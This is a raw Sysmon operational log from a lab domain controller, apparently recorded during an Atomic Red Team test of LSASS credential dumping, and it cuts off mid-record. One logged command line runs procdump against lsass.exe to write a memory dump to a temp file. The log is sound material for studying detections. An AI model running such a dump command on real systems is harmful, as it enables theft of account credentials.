21:10:27.484{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025739Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025738Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025737Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025736Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025735Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025734Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|UNKNOWN(00007FFF5BA1CD48) 154100x800000000000000025733Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.481{4DB9351A-A343-60D3-5F06-00000000CF01}5360C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -mm lsass.exe C:\Windows\Temp\lsass_dump.dmp" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025732Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025731Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.468{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025730Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.406{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=9C905CE296990F028EFC8CC9F908FE09,SHA256=73FBE97487641ACD5B284683F723E46E349FF5FC31234642CD4F1E71F80D466E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025729Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.312{4DB9351A-A341-60D3-5E06-00000000CF01}6316ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025728Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.442{4DB9351A-9DEA-60D3-2E00-00000000CF01}8crl.certum.pl0type: 5 crl.akamai.certum.pl;type: 5 crl.certum.pl.edgekey.net;type: 5 e83157.dscb.akamaiedge.net;::ffff:23.38.191.10;::ffff:23.38.191.26;C:\Windows\sysmon64.exe 22542200x800000000000000025727Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.296{4DB9351A-9DEA-60D3-2E00-00000000CF01}8subca.ocsp-certum.com0type: 5 ocsp.akamai.certum.pl;type: 5 ocsp.certum.pl.edgekey.net;type: 5 e96763.dscb.akamaiedge.net;::ffff:104.98.114.184;::ffff:104.98.114.187;C:\Windows\sysmon64.exe 23542300x800000000000000025726Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:27.093{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=16C066928E479E3738382C319547B087,SHA256=F595CAE9E516517A82969364B825D018FFA25BEBE08354356D8E39D569244F43,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025725Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.915{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61541-false104.98.114.187-80http 354300x800000000000000025724Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.905{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsefalse127.0.0.1win-dc-663.attackrange.local65524-false127.0.0.1win-dc-663.attackrange.local53domain 354300x800000000000000025723Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.835{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-663.attackrange.local53domainfalse127.0.0.1win-dc-663.attackrange.local65524- 354300x800000000000000025722Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.835{4DB9351A-9DDD-60D3-1400-00000000CF01}1056C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:3600:7d00:9860:8494:380:ffff-65524-true7f00:1:4439:4b60:7404:488b:4368:4889-53domain 354300x800000000000000025721Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.440{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61540-false23.38.191.10-80http 354300x800000000000000025720Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.323{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53618- 354300x800000000000000025719Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.295{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61539-false104.98.114.184-80http 354300x800000000000000025718Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.182{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local58856- 23542300x800000000000000025773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.968{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=DB931BA41E34446C293AAF0939AAA36B,SHA256=BD8A3EFD01ADDDBA44F13E6D1B876E7237D8CDAA52EBE24FA7A909A88D5E69CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.952{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=749012F3ACC66A717E2BBA374B9EDFFC,SHA256=379CA599EB092AA55C32739983901F79FB29BB665ABC153CDA57C518BD0B05EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.921{4DB9351A-A343-60D3-6006-00000000CF01}6572ATTACKRANGE\AdministratorC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2truetrue 23542300x800000000000000025770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.499{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9757683D3C162C5AFD81EDD07DD29247,SHA256=7F743BAE0D8A82E9C178930B0F65D2701A3E20BB5F8CDA9C6391604F180C5031,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000025769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.926{4DB9351A-A341-60D3-5E06-00000000CF01}6316raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000025768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.914{4DB9351A-9DEA-60D3-2E00-00000000CF01}8ccsca2021.ocsp-certum.com0type: 5 ocsp.akamai.certum.pl;type: 5 ocsp.certum.pl.edgekey.net;type: 5 e96763.dscb.akamaiedge.net;::ffff:104.98.114.187;::ffff:104.98.114.184;C:\Windows\sysmon64.exe 23542300x800000000000000025767Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.359{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B8E5A6AB136F94B8CCF99D8C6838BD69,SHA256=450EA0E9C11C9ECE68A0B4C0247FCD412A5F0391579E38E35819B0001DB99973,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025766Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:28.359{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ABE51C9055580465B58BC4B99B73B0A,SHA256=94AC7C550CECB329F1F33EDDEA8A686541ABCAEE458E93F043CD5585204C5F81,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025765Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:25.931{4DB9351A-A341-60D3-5E06-00000000CF01}6316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-663.attackrange.local61542-false185.199.109.133cdn-185-199-109-133.github.com443https 17141700x800000000000000025817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:29.984{4DB9351A-A345-60D3-6306-00000000CF01}3656\PSHost.132689562298776610.3656.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.952{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_bg0xld0q.vt3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.952{4DB9351A-A345-60D3-6306-00000000CF01}3656ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3k5jyb01.y04.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.937{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3k5jyb01.y04.ps12021-06-23 21:10:29.937 23542300x800000000000000025813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.937{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=82A020500BB418E626458897A4588E31,SHA256=8D33DABD8FD9855CD50C5296CA4F125EC0D06CDC7FE7B4DD904B8DFDDE544DB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.921{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A345-60D3-6306-00000000CF01}3656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:29.874{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 